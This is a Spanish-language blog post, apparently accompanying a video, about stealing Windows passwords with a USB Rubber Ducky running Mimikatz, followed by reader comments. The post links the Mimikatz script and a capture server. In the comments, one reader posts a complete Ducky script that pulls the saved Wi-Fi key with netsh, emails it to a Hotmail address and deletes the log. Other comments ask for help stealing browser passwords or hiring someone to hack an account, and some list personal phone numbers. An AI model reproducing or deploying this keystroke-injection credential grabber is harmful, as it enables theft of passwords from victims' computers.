Hackeando contraseñas con el USB Rubber Ducky como en Mr.Robot

Este episodio de HackWise se inspira en la serie de mr.robot al ver una pequeña escena donde obtienen las contraseñas de una máquina Windows con tan solo 15 segundos de acceso físico en la computadora de la víctima.
Utilizaremos el USB Rubber ducky creado por Darren Kitchen de Hak5 con un payload que utiliza la herramienta Mimikatz para obtener los usuarios y contraseñas almacenadas en el caché de la memoria RAM de la víctima.

No olvides Suscribirte a HackWise en youtube para más videos como este!!

Este es el código que utilizamos para el payload del rubber ducky.

**No olviden cambiar los siguientes enlaces para que se hospeden en su servidor:

https://github.com/clymb3r/PowerShell/blob/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1
http://hackwise.mx/h/rubber/Mimikatz/

Descarga el duck encoder desde: https://github.com/hak5darren/USB-Rubber-Ducky

Código en PHP para capturar las contraseñas y almacenarlas en nuestro servidor. 

Comandos para generar el payload inject.bin para el rubber ducky:

Contenido del archivo es.properties para poder generar ducky scripts para teclados en español.

Si tienes dudas, puedes dejar tus comentarios y con gusto te ayudaré 😀

Esto es todo por el video de esta semana, no olviden suscribirse a HackWise en youtube, hasta la próxima !

 

  • Angelben Sánchez

    Donde puedo conseguir ese USB con puerto para micro SD? Cómo se llama ese dispositivo? Saludos de México!

  • Angelben Sánchez

    Se puede hacer que guarde los datos en la micro SD en lugar de subir a un servidor?
    Se puede utilizar para sacar las contraseñas de algún wifi que estén almacenadas en la pc?
    Me puedes vender uno de esos Rubber Ducky’s xd?
    Saludos de México!

    • Ronny Alexander Eras

      sí se puede, te adjunto el script con el que puedes sacar la contra del wifi al cual esté conectado y enviartelo al correo
      WINDOWS d
      REM –> Open cmd
      WINDOWS r
      DELAY 500
      STRING cmd
      ENTER
      DELAY 1000
      REM –> Getting SSID
      STRING cd “%USERPROFILE%Desktop” & for /f “tokens=2 delims=: ” %A in (‘netsh wlan show interface ^| findstr “SSID” ^| findstr /v “BSSID”‘) do set A=%A
      ENTER
      STRING netsh wlan show profile name=%A% key=clear >> Log.log
      ENTER
      REM –> Mail Log.txt
      STRING powershell
      ENTER
      STRING $SMTPServer = ‘smtp.live.com’
      ENTER
      STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
      ENTER
      STRING $SMTPInfo.EnableSsl = $true
      ENTER
      STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential(‘[email protected]’, ‘contraseña’)
      ENTER
      STRING $ReportEmail = New-Object System.Net.Mail.MailMessage
      ENTER
      STRING $ReportEmail.From = ‘[email protected]
      ENTER
      STRING $ReportEmail.To.Add(‘[email protected]’)
      ENTER
      STRING $ReportEmail.Subject = ‘WiFi key grabber’
      ENTER
      STRING $ReportEmail.Body = (Get-Content Log.txt | out-string)
      ENTER
      STRING $SMTPInfo.Send($ReportEmail)
      ENTER
      STRING exit
      ENTER
      REM –> Delete Log.txt and exit
      STRING del Log.txt & exit
      ENTER

      • Edgar Romero

        emm se puede en u dispositivo usb normal?
        o es necesario el Rubber Ducky

        • Kardia Asterismo

          El Rubber Ducky a grandes rasgos se puede decir que es una mini computadora, por eso puede ejecutar las secuencias de comandos sin necesidad de un usuario. Puedes hacerlo con cualquier otro dispositivo que pueda ejecutar esas secuencias por ejemplo: un celular android, arduino, raspberry, etc. En cuanto a tu primera pregunta si se puede realizar en un USB normal con la desventaja de que necesitas infectar la computadora para poder ejecutar los comandos con la gran desventaja, de que tu necesitas iniciarlos (andar haciendo clicks o escribiendo) lo cual toma mas de los 15 segundos que tarda el Rubber Ducky.

      • Carlos Celedon

        hola me puedes ayudar 😛 quiero hacer que saque las claves del navegador y que me las mande por correo o deje en un txt en la memoria te dejo mi numero por si me puedes hablar por telegram o whatsapp +56932916736

  • el prinss

    Donde puedo adquirir un USB Rubber Ducky?

  • Esteban Ortiz

    Me puedes vender uno de esos Rubber Ducky’s, aunque sea usado De Argentina Neuquen

    • Aaron Maldonado

      x2

  • Armyzael

    Tengo una duda si no quiero subirlo al servidor y lo que quiero que se me grabe en un block de notas comun dentro de la misma memoria, como seria el codigo, y otra cosa he visto que varia gente deja guardada sus contraseñas dentro de sus buscadores de internet como ser google crome o moxila firefox, se podran tomar obtener estos accesos, como seria el codigo y que recomendscion puedes hacer para evitar que alguen ya sea por broma o por maldad copie tus contraseñas

    • Roderick Gonzalez

      la idea es que todos podamos acceder a tus contraseñas.. (asi el mas rapido podra hackear los accesos de bancos que robes para nosotros) para eso es esta mierda… o es que no te distes de cuenta????? xDDDDDDDD hahahahaha

  • Misael Balderas

    Que tal César oye porque no haces un vídeo de como se realizaría una Rubber ducky con una USB creo que llamaría más la atención

  • Pedro Matias Contreras Lagos

    como puedo lograr programar la arduino en caracteres en español, los 2 puntos (:) me sale como una ñ y me hecha a perder el codigo.

    • Armando Hernandez

      sacalo del teclado virtual del windows, lo copias y lo vas pegando, ya despues con calma busca entre las teclas dodne tienes ubicado el dos puntos

  • Armando Hernandez

    Si no tengo el presupuesto ni el tiempo de esperar a que me llegue una rubber ducky que alternativa tengo con las usb?

  • Danilo Hernández

    hola quiero que coloque la contraseña en un archivo de texto y guardarlo en la memoria hay alguna posibilidad?

  • alvaro

    hola amigo, te sigo mucho en tus videos me gustaria contactarme contigo de alguna manera mas privada para que me ayudes en algunos problemas que eh tenido al seguir tus videos (no puedo completar tus videos y hacer las cosas que deseo) 🙁 ojala respondas a este mensaje hablame porfavor para eguir apoyandote +56998227092

  • Carlos Cortez Gold

    Amigo necesito un trabajo de hackeo para una cuenta Google es para recuperación no robo alguien logro entrar y sacarme porfavor necesito ayuda pienso pagarle

    • Ezio Auditore

      No tienes ni idea de lo que te estás exponiendo ante estafadores. Cualquier te dirá que te ayudará por cierta cantidad de dinero y tu caerás cual noob.
      A ver si te avivas, que estás en Internet

  • Carlos Celedon

    disculpa la ignorancia este mismo metodo pero que me lo mande por correo (en español) me puedes enseñar

  • Carlos Celedon

    hola me puedes ayudar 😛 quiero hacer que saque las claves del navegador y que me las mande por correo o deje en un txt en la memoria te dejo mi numero por si me puedes hablar por telegram o whatsapp +56932916736 por favor

  • Ryushei

    alguien podria ayudarme a usar esto que lo he intentado un montón de veces decirme quien lo haya probado